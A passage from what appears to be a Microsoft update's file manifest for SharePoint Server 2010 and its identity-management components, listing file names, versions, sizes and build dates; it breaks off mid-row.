\ngetspotlight.ashx| getspotlight.ashx| | 285| 11-Sep-2018| 02:11 \nglobaloptions.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| globaloptions.dll| 4.0.2450.49| 281,192| 11-Sep-2018| 05:22 \ngrouplistview.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| grouplistview.dll| 4.0.2450.49| 129,640| 11-Sep-2018| 05:22 \ngwpcntwp.dwp| contactwp.dwp| | 544| 07-Sep-2018| 04:17 \nhauto1.apx| autoredistribute.aspx| | 17,055| 07-Sep-2018| 04:12 \nhauto2.apx| confirmredistribute.aspx| | 12,081| 07-Sep-2018| 04:12 \nhauto3.apx| progress.aspx| | 10,832| 07-Sep-2018| 04:12 \nhedit1.apx| edithostdistrule.aspx| | 14,003| 07-Sep-2018| 04:12 \nhelpurl.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| helpurl.xml| | 589| 07-Sep-2018| 03:39 \nhierarchychart.xap| hierarchychart.xap| | 35,423| 11-Sep-2018| 06:24 \nhmng1.apx| managehostdistrules.aspx| | 16,469| 07-Sep-2018| 04:12 \nhold.aspx| hold.aspx| | 5,682| 11-Sep-2018| 02:11 \nholdreport.aspx| holdreport.aspx| | 3,145| 11-Sep-2018| 02:11 \nibmdsmaattributeinclusionlis.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ibmdsmaattributeinclusionlist.xml| | 984| 07-Sep-2018| 03:39 \nibmdsmamandatoryattributelis.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ibmdsmamandatoryattributelist.xml| | 53| 07-Sep-2018| 03:39 \nibmdsmamandatoryobjectclassl.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ibmdsmamandatoryobjectclasslist.xml| | 39| 07-Sep-2018| 03:39 \nibmdsmaobjectclassinclusionl.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ibmdsmaobjectclassinclusionlist.xml| | 331| 07-Sep-2018| 03:39 \nibmdsmapropertypages.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ibmdsmapropertypages.dll| 4.0.2450.49| 92,792| 11-Sep-2018| 05:22 \nibmdsuisettinginit.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ibmdsuisettinginit.xml| | 596| 07-Sep-2018| 03:39 \nifs.xml| ifs.xml| | 69| 07-Sep-2018| 04:39 \nifsadmin.xml| ifsadmin.xml| | 69| 07-Sep-2018| 04:39 \nimpfedl.apx| importfederatedlocation.aspx| | 14,160| 07-Sep-2018| 04:12 \nimporthelperconfig.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| importhelperconfig.xml| | 5,356| 07-Sep-2018| 03:39 \nimportpolicy.aspx| importpolicy.aspx| | 4,110| 11-Sep-2018| 02:11 \nincommon_webpart| incommon.dwp| | 560| 07-Sep-2018| 04:17 \nindicatorwebpart_dwp| indicatorwebpart.dwp| | 1,129| 07-Sep-2018| 04:17 \ninfopcst.asc| infopathpageconvertersettings.ascx| | 2,643| 07-Sep-2018| 11:41 \niniwrkflip.aspx| iniwrkflip.aspx| | 3,032| 11-Sep-2018| 02:11 \ninplcrls.aspx| inplacerecordslistsettings.aspx| | 10,644| 11-Sep-2018| 02:11 \ninplcrst.asx_docrt| inplacerecordssettings.aspx| | 11,898| 11-Sep-2018| 02:11 \ninputcsvfile.apx| inputcsvfile.aspx| | 6,465| 11-Sep-2018| 06:14 \niplanetmapropertypages.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| iplanetmapropertypages.dll| 4.0.2450.49| 125,568| 11-Sep-2018| 05:22 \nipmaattributeinclusionlist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ipmaattributeinclusionlist.xml| | 961| 07-Sep-2018| 03:39 \nipmamandatoryattributelist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ipmamandatoryattributelist.xml| | 53| 07-Sep-2018| 03:39 \nipmamandatoryobjectclasslist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ipmamandatoryobjectclasslist.xml| | 39| 07-Sep-2018| 03:39 \nipmaobjectclassinclusionlist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ipmaobjectclassinclusionlist.xml| | 280| 07-Sep-2018| 03:39 \nipuisettinginit.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| ipuisettinginit.xml| | 596| 07-Sep-2018| 03:39 \nitemexpiration.aspx| itemexpiration.aspx| | 11,479| 11-Sep-2018| 02:11 \niviewh.aspx| iviewhost.aspx| | 826| 07-Sep-2018| 04:17 \niview_dwp| iviewwebpart.dwp| | 444| 07-Sep-2018| 04:17 \nkeyworddetails1.aspx| keyworddetails.aspx| | 17,103| 07-Sep-2018| 04:12 \nkpiforms.asx| kpilistformtemplates.ascx| | 7,886| 07-Sep-2018| 04:17 \nkpilistwebpart_dwp| kpilistwebpart.dwp| | 1,126| 07-Sep-2018| 04:17 \nkpiview.asx| kpilistviewpage.aspx| | 4,937| 07-Sep-2018| 04:17 \nkword.apx| keyword.aspx| | 11,978| 07-Sep-2018| 04:12 \nlabelimage.aspx| labelimage.aspx| | 375| 11-Sep-2018| 02:11 \nlanguage.asx| languages.aspx| | 3,453| 11-Sep-2018| 02:11 \nlcscntrl.acx| listcontentsourcescontrol.ascx| | 10,770| 07-Sep-2018| 04:12 \nlinkschecker.aspx| linkschecker.aspx| | 5,056| 07-Sep-2018| 04:17 \nlinkscheckerwiz.aspx| linkscheckerwiz.aspx| | 4,400| 07-Sep-2018| 04:17 \nlistenabletargeting.aspx| listenabletargeting.aspx| | 4,171| 07-Sep-2018| 04:17 \nlnksjobset.apx| linkscheckerjobsettings.aspx| | 5,178| 07-Sep-2018| 04:17 \nlnmaattributeinclusionlist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| lnmaattributeinclusionlist.xml| | 1,659| 07-Sep-2018| 03:39 \nlnmamandatoryattributelist.x.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| lnmamandatoryattributelist.xml| | 269| 07-Sep-2018| 03:39 \nlnmamandatoryobjectclasslist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| lnmamandatoryobjectclasslist.xml| | 65| 07-Sep-2018| 03:39 \nlnmaobjectclassinclusionlist.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| lnmaobjectclassinclusionlist.xml| | 151| 07-Sep-2018| 03:39 \nlnschema.dsml.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| lnschema.dsml| | 26,113| 07-Sep-2018| 03:39 \nlnuisettinginit.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| lnuisettinginit.xml| | 665| 07-Sep-2018| 03:39 \nlocselec.asc| locationselector.ascx| | 3,349| 07-Sep-2018| 11:41 \nlogcss.apx| logcontentsources.aspx| | 14,665| 07-Sep-2018| 04:12 \nlogerr.apx| logerrorhistory.aspx| | 15,700| 07-Sep-2018| 04:12 \nlogging.dll.amd64.e58be079_1383_426a_a42d_a0ada425309f| logging.dll| 4.0.2450.49| 18,528| 11-Sep-2018| 05:22 \nlogging.sln.amd64.e58be079_1383_426a_a42d_a0ada425309f| logging.sln| | 899| 07-Sep-2018| 03:39 \nlogging.vb.amd64.e58be079_1383_426a_a42d_a0ada425309f| logging.vb| | 11,080| 07-Sep-2018| 03:39 \nlogging.vbproj.amd64.e58be079_1383_426a_a42d_a0ada425309f| logging.vbproj| | 3,997| 07-Sep-2018| 03:39 \nlogging.xml.amd64.e58be079_1383_426a_a42d_a0ada425309f| logging.xml| | 448| 07-Sep-2018| 03:39 \nloghst.apx| logcrawlhistory.aspx| | 15,628| 07-Sep-2018| 04:12 \nlogin.xml| login.aspx| | 1,658| 07-Sep-2018| 11:41 \nlogsmry.apx| logsummary.aspx| | 16,828| 07-Sep-2018| 04:12 \nlogvwr.apx| logviewer.aspx| | 25,612| 07-Sep-2018| 04:12 \nlroperationstatus.aspx| lroperationstatus.aspx| | 4,964| 07-Sep-2018| 04:17 \nlroprog.asx| longrunningoperationprogress.aspx| | 5,518| 07-Sep-2018| 11:41 \nlstcat.apx| listcategories.aspx| | 13,565| 07-Sep-2018| 04:12 \nlstcct.apx| listcrawledproperties.aspx| | 14,776| 07-Sep-2018| 04:12 \nlstcs.apx| listcontentsources.aspx| | 9,949| 07-Sep-2018| 04:12 \nlstdspgp.apx| listdisplaygroups.aspx| | 21,655| 07-Sep-2018| 04:12 \nlstkw.apx| listkeywords.aspx| | 6,778| 07-Sep-2018| 04:12 \nlstmnp.apx| listmanagedproperties.aspx| | 14,891| 07-Sep-2018| 04:12 \nlstsnm.apx| listservernamemappings.aspx| | 12,101| 07-Sep-2018| 04:12 \nmaconfig.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| microsoft.directoryservices.metadirectoryservices.config.dll| 4.0.2450.49| 60,104| 11-Sep-2018| 05:22 \nmaconfig.dll_help.xml.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| | | 34,128| 07-Sep-2018| 03:39 \nmaexecution.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| maexecution.dll| 4.0.2450.49| 240,232| 11-Sep-2018| 05:22 \nmaexport.exe.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| maexport.exe| 4.0.2450.49| 23,648| 11-Sep-2018| 05:22 \nmahostm.dll.amd64.7f89bde0_1c6c_49ad_a1d5_ba9bbcc6bbcc| mahostm.dll| 4.0.2450.49| 326,752| 11-Sep-2018| 05:22 \nmahostn.dll.amd64.7f89bde0_1c6c_49ad_a1d5_ba9bbcc6bbcc| mahostn.dll| 4.0.2450.49| 97,376| 11-Sep-2018| 05:22 \nmakecert.exe.62b8ceef_1020_4520_8b7c_a5a4c498eb66| makecert.exe| 6.0.6001.17131 (longhorn_rtm.080108-2300)| 57,856| 07-Sep-2018| 03:39 \nmanagedpropertymanagement1.aspx| managedpropertymanagement.aspx| | 7,206| 07-Sep-2018| 04:12 \nmanagelinks.aspx| managelinks.aspx| | 16,972| 07-Sep-2018| 04:17 \nmanagementpolicyrule.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| managementpolicyrule.moss.sql|managementpolicyrule.sql| | 203,055| 11-Sep-2018| 05:22 \nmanagesocialitems.aspx| managesocialitems.aspx| | 21,281| 07-Sep-2018| 04:17 \nmanagesssvcapplication.aspx| managesssvcapplication.aspx| | 5,221| 07-Sep-2018| 03:31 \nmanagesssvcapplicationcredentials.aspx| managesssvcapplicationcredentials.aspx| | 4,312| 07-Sep-2018| 03:31 \nmanagesubtype.aspx| managesubtypes.aspx| | 4,575| 07-Sep-2018| 04:17 \nmanagetargetappclaims.aspx| managetargetapplicationclaims.aspx| | 4,368| 07-Sep-2018| 03:31 \nmanagetargetappfields.aspx| managetargetapplicationfields.aspx| | 5,102| 07-Sep-2018| 03:31 \nmanagetargetappinstance.aspx| managetargetapplicationinstance.aspx| | 4,536| 07-Sep-2018| 03:31 \nmanagetargetappstate.aspx| managetargetapplicationstateinfo.aspx| | 4,007| 07-Sep-2018| 03:31 \nmanageuserprofileserviceapplication.aspx| manageuserprofileserviceapplication.aspx| | 3,333| 07-Sep-2018| 04:17 \nmanifest.21022.08.vc90_atl_x64.rtm.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.vc90.atl.manifest| | 468| 07-Sep-2018| 03:39 \nmapackager.exe.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mapackager.exe| 4.0.2450.49| 43,624| 11-Sep-2018| 05:22 \nmapropertypages.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mapropertypages.dll| 4.0.2450.49| 350,832| 11-Sep-2018| 05:22 \nmchrule.apx| matchingrule.aspx| | 18,743| 07-Sep-2018| 04:12 \nmchrule1.apx| matchingrule.aspx| | 24,240| 07-Sep-2018| 04:12 \nmcrcntrl.acx| managecrawlrulescontrol.ascx| | 7,556| 07-Sep-2018| 04:12 \nmcrypt.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mcrypt.dll| 4.0.2450.49| 2,858,592| 11-Sep-2018| 05:22 \nmembership.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| membership.moss.sql|membership.sql| | 181,346| 11-Sep-2018| 05:22 \nmetadatacolsettings.apx| metadatacolsettings.aspx| | 5,365| 11-Sep-2018| 06:14 \nmetadatanavkeyfilters.ascx| metadatanavkeyfilters.ascx| | 4,516| 11-Sep-2018| 02:11 \nmetadatanavtree.ascx| metadatanavtree.ascx| | 2,686| 11-Sep-2018| 02:11 \nmetanavpernode.aspx| metanavpernode.aspx| | 14,134| 11-Sep-2018| 02:11 \nmetanavsettings.aspx| metanavsettings.aspx| | 14,595| 11-Sep-2018| 02:11 \nmetaprxy.apx| managemetadataproxy.aspx| | 5,429| 11-Sep-2018| 06:14 \nmetasvc.apx| managemetadataservice.aspx| | 7,228| 11-Sep-2018| 06:14 \nmgrdsserver.aspx| mgrdsserver.aspx| | 2,181| 07-Sep-2018| 04:17 \nmgrperms.aspx| manageservicepermissions.aspx| | 30,126| 07-Sep-2018| 04:17 \nmgrpolicy.aspx| manageprivacypolicy.aspx| | 16,348| 07-Sep-2018| 04:17 \nmgrproperty.aspx| mgrproperty.aspx| | 2,280| 07-Sep-2018| 04:17 \nmicrosoft.identitymanagement.externalsettingsmanager.dll.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.identitymanagement.externalsettingsmanager.dll| 4.0.2450.49| 31,424| 11-Sep-2018| 05:22 \nmicrosoft.identitymanagement.externalsettingsmanager.dll.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.identitymanagement.externalsettingsmanager.dll| 4.0.2450.49| 31,424| 11-Sep-2018| 05:22 \nmicrosoft.identitymanagement.findprivatekey.exe.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.identitymanagement.findprivatekey.exe| 4.0.2450.49| 16,040| 11-Sep-2018| 05:22 \nmicrosoft.identitymanagement.logging.dll| | 4.0.2450.49| 51,864| 11-Sep-2018| 05:22 \nmicrosoft.identitymanagement.settingscontract.dll.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| microsoft.identitymanagement.settingscontract.dll| 4.0.0.0| 11,952| 11-Sep-2018| 05:22 \nmicrosoft.identitymanagement.settingscontract.dll.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.identitymanagement.settingscontract.dll| 4.0.0.0| 11,952| 11-Sep-2018| 05:22 \nmicrosoft.identitymanagement.setuputils.dll| microsoft.identitymanagement.setuputils.dll| 4.0.2450.49| 80,544| 11-Sep-2018| 05:22 \nmicrosoft.identitymanagement.setuputils.dll.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.identitymanagement.setuputils.dll| 4.0.2450.49| 80,544| 11-Sep-2018| 05:22 \nmicrosoft.identitymanagement.sqm.dll.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.identitymanagement.sqm.dll| 4.0.2450.49| 39,568| 11-Sep-2018| 05:22 \nmicrosoft.logging.dll.amd64.7f89bde0_1c6c_49ad_a1d5_ba9bbcc6bbcc| microsoft.identitymanagement.logging.dll| 4.0.2450.49| 51,864| 11-Sep-2018| 05:22 \nmicrosoft.metadirectoryservices.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| microsoft.metadirectoryservices.dll|microsoft.metadirectoryservicesex.dll| 4.0.0.0| 60,048| 11-Sep-2018| 05:22 \nmicrosoft.metadirectoryservicesex.dll.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.metadirectoryservicesex.dll| 4.0.0.0| 60,048| 11-Sep-2018| 05:22 \nmicrosoft.office.documentmanagement.dll| microsoft.office.documentmanagement.dll| 14.0.7158.5000| 381,032| 11-Sep-2018| 02:11 \nmicrosoft.office.documentmanagement.dll_isapi| microsoft.office.documentmanagement.dll| 14.0.7158.5000| 381,032| 11-Sep-2018| 02:11 \nmicrosoft.office.documentmanagement.pages.dll| microsoft.office.documentmanagement.pages.dll| 14.0.7005.1000| 125,552| 11-Sep-2018| 02:11 \nmicrosoft.office.policy.dll| microsoft.office.policy.dll| 14.0.7156.5000| 883,376| 11-Sep-2018| 02:11 \nmicrosoft.office.policy.dll_isapi| microsoft.office.policy.dll| 14.0.7156.5000| 883,376| 11-Sep-2018| 02:11 \nmicrosoft.office.policy.pages.dll| microsoft.office.policy.pages.dll| 14.0.7213.5000| 223,752| 11-Sep-2018| 02:11 \nmicrosoft.office.server.chart.dll| microsoft.office.server.chart.dll| 14.0.7254.5000| 618,176| 17-Jun-2020| 01:30 \nmicrosoft.office.server.chart_gac.dll| microsoft.office.server.chart.dll| 14.0.7254.5000| 618,176| 17-Jun-2020| 01:30 \nmicrosoft.office.server.conversions.dll| microsoft.office.server.conversions.dll| 14.0.7113.5001| 35,528| 11-Sep-2018| 02:11 \nmicrosoft.office.server.dll| microsoft.office.server.dll| 14.0.7142.5000| 1,874,600| 11-Sep-2018| 06:14 \nmicrosoft.office.server.dll_isapi| microsoft.office.server.dll| 14.0.7142.5000| 1,874,600| 11-Sep-2018| 06:14 \nmicrosoft.office.server.filtercontrols.dll| microsoft.office.server.filtercontrols.dll| 14.0.7137.5000| 166,600| 11-Sep-2018| 06:14 \nmicrosoft.office.server.native.dll| microsoft.office.server.native.dll| 14.0.7248.5000| 680,600| 14-Apr-2020| 12:09 \nmicrosoft.office.server.openxml.dll| microsoft.office.server.openxml.dll| 14.0.7248.5000| 1,264,792| 14-Apr-2020| 12:09 \nmicrosoft.office.server.userprofiles.dll| microsoft.office.server.userprofiles.dll| 14.0.7254.5000| 2,780,864| 17-Jun-2020| 01:28 \nmicrosoft.office.server.userprofiles.dll_isapi| microsoft.office.server.userprofiles.dll| 14.0.7254.5000| 2,780,864| 17-Jun-2020| 01:28 \nmicrosoft.office.server.userprofiles.managementagent.dll| microsoft.office.server.userprofiles.managementagent.dll| 14.0.7139.5000| 72,416| 11-Sep-2018| 06:14 \nmicrosoft.office.server.userprofiles.synchronization.dll| microsoft.office.server.userprofiles.synchronization.dll| 14.0.7130.5000| 260,832| 11-Sep-2018| 06:14 \nmicrosoft.office.workflowsoap.dll| microsoft.office.workflowsoap.dll| 14.0.7003.1000| 64,152| 11-Sep-2018| 02:11 \nmicrosoft.resman.dll.amd64.7f89bde0_1c6c_49ad_a1d5_ba9bbcc6bbcc| microsoft.resourcemanagement.dll| 4.0.2450.49| 760,456| 11-Sep-2018| 05:22 \nmicrosoft.resman.service.exe.amd64.7f89bde0_1c6c_49ad_a1d5_ba9bbcc6bbcc| microsoft.resourcemanagement.service.exe| 4.0.2450.49| 989,848| 11-Sep-2018| 05:22 \nmicrosoft.resourcemanagement.dll| microsoft.resourcemanagement.dll| 4.0.2450.49| 760,456| 11-Sep-2018| 05:22 \nmicrosoft.resourcemanagement.service.exe| | 4.0.2450.49| 989,848| 11-Sep-2018| 05:22 \nmicrosoft.resourcemanagement.service.exe.config.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.resourcemanagement.service.exe.config| | 3,043| 07-Sep-2018| 03:39 \nmicrosoft.resourcemanagement.service.exe.ilminstall.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.resourcemanagement.service.exe| 4.0.2450.49| 989,848| 11-Sep-2018| 05:22 \nmicrosoft.resourcemanagement.service.exe.mossinstall.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.resourcemanagement.service.exe| 4.0.2450.49| 989,848| 11-Sep-2018| 05:22 \nmicrosoft.resourcemanagement.serviceconfiguration.preparationutility.exe.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.resourcemanagement.serviceconfiguration.preparationutility.exe| 4.0.2450.49| 15,584| 11-Sep-2018| 05:22 \nmicrosoft.resourcemanagement.serviceconfiguration.utility.exe.62b8ceef_1020_4520_8b7c_a5a4c498eb66| microsoft.resourcemanagement.serviceconfiguration.utility.exe| 4.0.2450.49| 51,912| 11-Sep-2018| 05:22 \nmicrosoft.sharepoint.publishing.dll_isapi| microsoft.sharepoint.publishing.dll| 14.0.7252.5000| 3,219,112| 16-Jun-2020| 07:57 \nmicrosoft.sharepoint.taxonomy.dll| microsoft.sharepoint.taxonomy.dll| 14.0.7171.5000| 1,064,688| 11-Sep-2018| 06:14 \nmicrosoft.sharepoint.taxonomy.dll_gac| microsoft.sharepoint.taxonomy.dll| 14.0.7171.5000| 1,064,688| 11-Sep-2018| 06:14 \nmicrosoft_office_server_conversions_launcher_exe| microsoft.office.server.conversions.launcher.exe| 14.0.7113.5001| 84,696| 11-Sep-2018| 02:11 \nmicrosoft_office_server_conversions_loadbalancer_exe| microsoft.office.server.conversions.loadbalancer.exe| 14.0.7113.5001| 43,744| 11-Sep-2018| 02:11 \nmiisactivate.exe.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| miisactivate.exe| 4.0.2450.49| 23,656| 11-Sep-2018| 05:22 \nmiisclient.exe.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| miisclient.exe| 4.0.2450.49| 830,056| 11-Sep-2018| 05:22 \nmiisclient.exe.config.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| miisclient.exe.config| | 448| 07-Sep-2018| 03:39 \nmiiserver.exe.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| miiserver.exe| 4.0.2450.49| 2,902,112| 11-Sep-2018| 05:22 \nmiiserver.exe.config.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| miiserver.exe.config| | 2,822| 07-Sep-2018| 03:39 \nmiiskmu.exe.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| miiskmu.exe| 4.0.2450.49| 375,392| 11-Sep-2018| 05:22 \nmiisrcw.dll.62b8ceef_1020_4520_8b7c_a5a4c498eb66| miisrcw.dll| 4.0.2450.49| 39,520| 11-Sep-2018| 05:22 \nmiisrcw.dll.amd64.7f89bde0_1c6c_49ad_a1d5_ba9bbcc6bbcc| miisrcw.dll| 4.0.2450.49| 39,520| 11-Sep-2018| 05:22 \nmiissettingsprovider.dll| | 14.0.7004.1000| 14,416| 11-Sep-2018| 01:53 \nmms.chm.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| mms.chm| | 593,810| 07-Sep-2018| 03:39 \nmmscntrl.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmscntrl.dll| 4.0.2450.49| 300,128| 11-Sep-2018| 05:22 \nmmsevent.dll.amd64.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll| 4.0.2450.49| 8,800| 11-Sep-2018| 05:22 \nmmsevent.dll.ar_sa.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 78,912| 11-Sep-2018| 05:22 \nmmsevent.dll.bg_bg.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 94,784| 11-Sep-2018| 05:22 \nmmsevent.dll.ca_es.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 99,904| 11-Sep-2018| 05:22 \nmmsevent.dll.cs_cz.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 86,592| 11-Sep-2018| 05:22 \nmmsevent.dll.da_dk.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 95,808| 11-Sep-2018| 05:22 \nmmsevent.dll.de_de.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 97,856| 11-Sep-2018| 05:22 \nmmsevent.dll.el_gr.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 102,976| 11-Sep-2018| 05:22 \nmmsevent.dll.en_us.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 87,616| 11-Sep-2018| 05:22 \nmmsevent.dll.es_es.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 100,928| 11-Sep-2018| 05:22 \nmmsevent.dll.et_ee.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 79,424| 11-Sep-2018| 05:22 \nmmsevent.dll.fi_fi.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 87,104| 11-Sep-2018| 05:22 \nmmsevent.dll.fr_fr.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 105,536| 11-Sep-2018| 05:22 \nmmsevent.dll.he_il.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 72,768| 11-Sep-2018| 05:22 \nmmsevent.dll.hi_in.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 86,592| 11-Sep-2018| 05:22 \nmmsevent.dll.hr_hr.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 92,736| 11-Sep-2018| 05:22 \nmmsevent.dll.hu_hu.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 97,344| 11-Sep-2018| 05:22 \nmmsevent.dll.it_it.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 96,832| 11-Sep-2018| 05:22 \nmmsevent.dll.ja_jp.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 59,968| 11-Sep-2018| 05:22 \nmmsevent.dll.kk_kz.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 87,104| 11-Sep-2018| 05:22 \nmmsevent.dll.ko_kr.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 53,824| 11-Sep-2018| 05:22 \nmmsevent.dll.lt_lt.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 88,128| 11-Sep-2018| 05:22 \nmmsevent.dll.lv_lv.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 86,096| 11-Sep-2018| 05:22 \nmmsevent.dll.nb_no.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 87,104| 11-Sep-2018| 05:22 \nmmsevent.dll.nl_nl.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 94,784| 11-Sep-2018| 05:22 \nmmsevent.dll.pl_pl.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 100,928| 11-Sep-2018| 05:22 \nmmsevent.dll.pt_br.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 96,832| 11-Sep-2018| 05:22 \nmmsevent.dll.pt_pt.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 96,320| 11-Sep-2018| 05:22 \nmmsevent.dll.ro_ro.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 99,392| 11-Sep-2018| 05:22 \nmmsevent.dll.ru_ru.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 90,176| 11-Sep-2018| 05:22 \nmmsevent.dll.sk_sk.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 88,640| 11-Sep-2018| 05:22 \nmmsevent.dll.sl_si.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 96,320| 11-Sep-2018| 05:22 \nmmsevent.dll.sr_latn_cs.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 91,712| 11-Sep-2018| 05:22 \nmmsevent.dll.sv_se.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 85,568| 11-Sep-2018| 05:22 \nmmsevent.dll.th_th.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 84,544| 11-Sep-2018| 05:22 \nmmsevent.dll.tr_tr.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 88,128| 11-Sep-2018| 05:22 \nmmsevent.dll.uk_ua.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 91,200| 11-Sep-2018| 05:22 \nmmsevent.dll.zh_cn.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 43,584| 11-Sep-2018| 05:22 \nmmsevent.dll.zh_hk.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| mmsevent.dll.mui| 4.0.2450.49| 46,656| 11-Sep-2018| 05:22 \nmmsevent.dll.zh_tw.2dbd5ffd_aaa6_4300_a0f3_ad05ae0862c5| 